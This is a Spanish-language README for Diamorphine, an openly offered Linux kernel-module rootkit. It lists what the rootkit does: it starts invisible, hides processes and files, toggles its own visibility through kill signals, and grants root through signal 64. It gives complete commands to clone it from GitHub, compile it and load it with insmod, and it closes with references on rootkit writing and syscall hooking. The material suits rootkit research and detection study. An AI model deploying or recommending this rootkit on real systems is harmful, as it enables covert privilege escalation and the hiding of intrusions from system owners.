
LKM rootkit para Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 y ARM64)
Diamorphine es un rootkit LKM para kernels Linux 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 y ARM64)
Al cargarse, el módulo comienza invisible;
Ocultar/mostrar cualquier proceso enviando una señal 31;
Enviar una señal 63 (a cualquier pid) hace que el módulo se vuelva (in)visible;
Enviar una señal 64 (a cualquier pid) otorga al usuario indicado privilegios de root;
Los archivos o directorios que comiencen con MAGIC_PREFIX se vuelven invisibles;
Verificar si el kernel es 2.6.x/3.x/4.x/5.x/6.x
uname -r
Clonar el repositorio
git clone https://github.com/m0nad/Diamorphine
Entrar en la carpeta
cd Diamorphine
Compilar
make
Cargar el módulo (como root)
insmod diamorphine.ko
El módulo comienza invisible; para eliminarlo hay que hacerlo visible
kill -63 0
Luego eliminar el módulo (como root)
rmmod diamorphine
Wikipedia Rootkit https://en.wikipedia.org/wiki/Rootkit
Linux Device Drivers http://lwn.net/Kernel/LDD3/
LKM HACKING https://web.archive.org/web/20140701183221/https://www.thc.org/papers/LKM_HACKING.html
Blog de Memset http://memset.wordpress.com/
Parcheo dinámico del kernel Linux sin LKM http://phrack.org/issues/58/7.html
ESCRIBIENDO UN ROOTKIT SIMPLE PARA LINUX https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
Linux Cross Reference http://lxr.free-electrons.com/
zizzu0 LinuxKernelModules https://github.com/zizzu0/LinuxKernelModules/
Rootkits Linux: Nuevos métodos para Kernel 5.7+ https://xcellerator.github.io/posts/linux_rootkits_11/
FlipSwitch: una técnica novedosa de enganche de syscalls https://www.elastic.co/security-labs/flipswitch-linux-rootkit